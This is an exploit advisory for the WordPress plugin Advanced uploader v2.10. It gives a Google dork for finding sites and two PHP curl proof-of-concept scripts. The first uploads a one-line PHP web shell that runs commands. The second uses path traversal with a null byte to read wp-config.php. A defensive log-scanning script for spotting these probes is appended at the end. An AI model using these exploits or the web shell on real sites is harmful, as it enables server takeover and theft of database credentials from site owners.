
WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities



#-Title: WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
#-Author: KedAns-Dz
#- E-mail : ked-h (@hotmail. com)
#-Date: 05/12/15
#-Link Download : wordpress.org/plugins/advanced-uploader/
#-Google Dork: inurl:wp-content/plugins/advanced-uploader/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////

Description : 
The WordPress plugin Advanced uploader v2.10 suffers from multiple vulnerabilities: a remote attacker can upload a file/shell/backdoor and execute commands, or disclose some local files.

Solution:

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

File Upload :
<?php
// page : upload.php
// lines : 1030... 1037

$postData = array();
$postData['file'] = "@3xploi7.php";
/* 3xploi7.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[localcrot].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

File Download :
<?php
// page : upload.php
// lines : 1219... 1237

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
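
For defenders checking whether a site running this plugin has been probed, the following added example (not part of the original advisory) scans web-server access logs for requests to the plugin's upload.php that carry traversal sequences or a null byte in the destinations parameter, and lists POSTs to that endpoint for review. The combined log format, the sample log lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

PLUGIN_PATH = "/wp-content/plugins/advanced-uploader/upload.php"  # path named in the advisory
# Assumed Apache/nginx "combined" format: ip, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Dec/2015:10:01:02 +0000] "GET /wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../wp-config.php%00 HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
198.51.100.7 - - [05/Dec/2015:10:01:09 +0000] "GET /wp-content/plugins/advanced-uploader/upload.php?destinations=%252e%252e%252fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
203.0.113.5 - - [05/Dec/2015:10:02:00 +0000] "POST /wp-content/plugins/advanced-uploader/upload.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
192.0.2.10 - - [05/Dec/2015:10:03:05 +0000] "GET /wp-content/plugins/advanced-uploader/upload.php?destinations=2015/12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

def fully_decode(value, rounds=3):
    """Percent-decode several times so double-encoded sequences are still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (ip, status, findings) for a plugin request needing review, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, uri, status = m.groups()
    path, _, query = uri.partition("?")
    path = re.sub(r"/+", "/", fully_decode(path)).lower()
    if not path.endswith(PLUGIN_PATH):  # endswith: WordPress may live in a subdirectory
        return None
    findings = []
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if fully_decode(key) != "destinations":
            continue
        value = fully_decode(raw).replace("\\", "/")
        if "\x00" in value:
            findings.append("null byte in destinations")
        if ".." in value.replace("\x00", "").split("/"):
            findings.append("path traversal in destinations")
    if method.upper() == "POST":
        # Access logs do not show authentication, so uploads are listed for review only.
        findings.append("upload POST to plugin endpoint")
    return (ip, int(status), findings) if findings else None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```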





